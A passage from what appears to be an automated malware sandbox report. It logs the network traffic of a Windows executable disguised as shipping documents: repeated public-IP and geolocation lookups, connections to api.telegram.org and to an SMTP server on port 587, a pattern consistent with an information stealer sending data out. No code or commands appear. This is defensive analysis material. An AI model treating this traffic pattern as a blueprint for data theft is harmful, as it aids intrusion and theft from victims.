Jan 9, 2025 15:08:15.177728891 CET	49725	443	192.168.2.5	104.21.80.1
Jan 9, 2025 15:08:15.189119101 CET	49724	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:15.195436954 CET	80	49724	132.226.247.73	192.168.2.5
Jan 9, 2025 15:08:15.195516109 CET	49724	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:15.197017908 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:15.197058916 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:15.197299957 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:15.197757006 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:15.197773933 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:15.834372997 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:15.834522009 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:15.836241007 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:15.836266994 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:15.836678028 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:15.838030100 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:15.879337072 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:16.073587894 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:16.073818922 CET	443	49726	149.154.167.220	192.168.2.5
Jan 9, 2025 15:08:16.073915005 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:16.077516079 CET	49726	443	192.168.2.5	149.154.167.220
Jan 9, 2025 15:08:21.362118006 CET	49710	80	192.168.2.5	132.226.247.73
Jan 9, 2025 15:08:22.144547939 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:22.149383068 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:22.149471045 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:22.979424953 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:22.979646921 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:22.984715939 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.128880978 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.130172968 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:23.135031939 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.281904936 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.284024954 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:23.288948059 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.439059973 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.439390898 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:23.444273949 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.589921951 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.590280056 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:23.595053911 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.753628969 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.758743048 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:23.764038086 CET	587	49766	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:23.764286041 CET	49766	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:25.268865108 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:25.273696899 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:25.273783922 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:25.824188948 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:25.824338913 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:25.829296112 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:25.980206013 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:25.980406046 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:25.985294104 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.132090092 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.132426977 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:26.137187004 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.285197973 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.285376072 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:26.290293932 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.435837984 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.435991049 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:26.440716028 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.612903118 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.618012905 CET	49784	587	192.168.2.5	208.91.199.223
Jan 9, 2025 15:08:26.622992992 CET	587	49784	208.91.199.223	192.168.2.5
Jan 9, 2025 15:08:26.623811007 CET	49784	587	192.168.2.5	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 15:08:03.102482080 CET	61269	53	192.168.2.5	1.1.1.1
Jan 9, 2025 15:08:03.109954119 CET	53	61269	1.1.1.1	192.168.2.5
Jan 9, 2025 15:08:04.142868996 CET	58711	53	192.168.2.5	1.1.1.1
Jan 9, 2025 15:08:04.150773048 CET	53	58711	1.1.1.1	192.168.2.5
Jan 9, 2025 15:08:15.189701080 CET	53053	53	192.168.2.5	1.1.1.1
Jan 9, 2025 15:08:15.196532965 CET	53	53053	1.1.1.1	192.168.2.5
Jan 9, 2025 15:08:21.792994022 CET	58298	53	192.168.2.5	1.1.1.1
Jan 9, 2025 15:08:22.143557072 CET	53	58298	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 15:08:03.102482080 CET	192.168.2.5	1.1.1.1	0xb8ee	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.142868996 CET	192.168.2.5	1.1.1.1	0x877a	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:15.189701080 CET	192.168.2.5	1.1.1.1	0x26ca	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:21.792994022 CET	192.168.2.5	1.1.1.1	0x668c	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 15:08:03.109954119 CET	1.1.1.1	192.168.2.5	0xb8ee	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 15:08:03.109954119 CET	1.1.1.1	192.168.2.5	0xb8ee	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:03.109954119 CET	1.1.1.1	192.168.2.5	0xb8ee	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:03.109954119 CET	1.1.1.1	192.168.2.5	0xb8ee	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:03.109954119 CET	1.1.1.1	192.168.2.5	0xb8ee	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:03.109954119 CET	1.1.1.1	192.168.2.5	0xb8ee	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:04.150773048 CET	1.1.1.1	192.168.2.5	0x877a	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:15.196532965 CET	1.1.1.1	192.168.2.5	0x26ca	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:22.143557072 CET	1.1.1.1	192.168.2.5	0x668c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:22.143557072 CET	1.1.1.1	192.168.2.5	0x668c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:22.143557072 CET	1.1.1.1	192.168.2.5	0x668c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Jan 9, 2025 15:08:22.143557072 CET	1.1.1.1	192.168.2.5	0x668c	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:03.126188993 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:03.797022104 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 15:08:03.869067907 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 15:08:04.095330000 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 15:08:04.828701973 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 15:08:05.130068064 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:05.796746016 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 15:08:06.463402033 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:07.272345066 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:07.951169014 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:08.590399027 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:09.259701014 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:09.897664070 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:10.577900887 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:11.238620996 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:11.913813114 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:12.536067009 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:13.209084988 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49724	132.226.247.73	80	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 15:08:13.842118979 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 15:08:14.545092106 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:04 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 14:08:04 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746473 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMVU6zdhvixUfBO9%2BF%2B1ZRr3d0mCK5fP67WuSHup8gq9qIv4LaDp51Cq3eqdBB3S6d5S7lxYHSI3YFE4d6KPZqqW4FrL2F9tjYGY24YY9QNf9NwTKR%2FDQwBgVfX0z2%2FGEx1rrxUr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff4dcf6843ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1776&rtt_var=679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1644144&cwnd=225&unsent_bytes=0&cid=6383a36eb4baaccb&ts=211&x=0"
2025-01-09 14:08:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:05 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 14:08:05 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 14:08:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1746474 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OUkm0yaKcQpYRMZJrC63lU%2FPJxO5oglp1kyHCErUneBUACnuDZR%2BilPcTwAIULZ7LDgwSEKVDtraeKh5MuW0PXrO9nlFe4fnvYOAEOvjQo%2BB%2FF0agFZvOpn4jLfxqT2eQR4PgWqs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ff53a8ab8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=1939&rtt_var=890&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1126543&cwnd=223&unsent_bytes=0&cid=1b446b17a77d024b&ts=158&x=0"
2025-01-09 14:08:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	104.21.80.1	443	6300	C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 14:08:06 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
